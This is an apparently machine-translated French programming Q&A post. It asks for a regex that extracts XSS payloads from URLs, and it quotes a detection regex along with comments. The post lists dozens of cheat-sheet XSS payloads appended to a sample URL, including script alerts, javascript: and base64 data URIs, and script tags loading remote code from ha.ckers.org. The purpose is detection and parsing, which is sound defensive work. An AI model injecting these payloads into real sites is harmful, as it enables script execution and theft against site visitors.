J'ai besoin d'une regex qui correspondra à toutes les charges utiles XSS dans la liste suivante (je n'essaie pas de filtrer les requêtes XSS et d'enregistrer les URL en toute sécurité, j'essaie de tirer la charge utile de l'URL elle-même et l'enregistrer dans une variable pour une utilisation ultérieure):Regex pour correspondre à toutes les charges utiles XSS dans la liste suivante
http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert("XSS")>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)
Je ne réussi à trouver un et le modifier pour correspondre à certains, mais pas tous:
<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*i\W*s\W*i\W*n\W*d\W*e\W*x|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\0\/]|['\"])(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\0]*=
pour une exemple voir here, il ne correspondra que ceux qui ont un <script>
et certains d'entre eux, il ne fera pas un match complet sur eux. Est-ce que quelqu'un a une meilleure regex qui ne correspondra qu'à la charge utile XSS de l'URL, ou un meilleur moyen de trouver la charge utile XSS? Merci d'avance.
double possible de [bibliothèque Python pour le filtrage XSS?] (Https://stackoverflow.com/questions/901369/python-library-for-xss-filtering) – ctwheels
@ctwheels merci! – wahwahwah
@ctwheels hey, j'apprécie, mais ça ne répond pas à ma quête. Je n'essaie pas de filtrer le XSS, j'essaie d'extraire la charge utile de l'URL et de l'enregistrer en tant que variable. – wahwahwah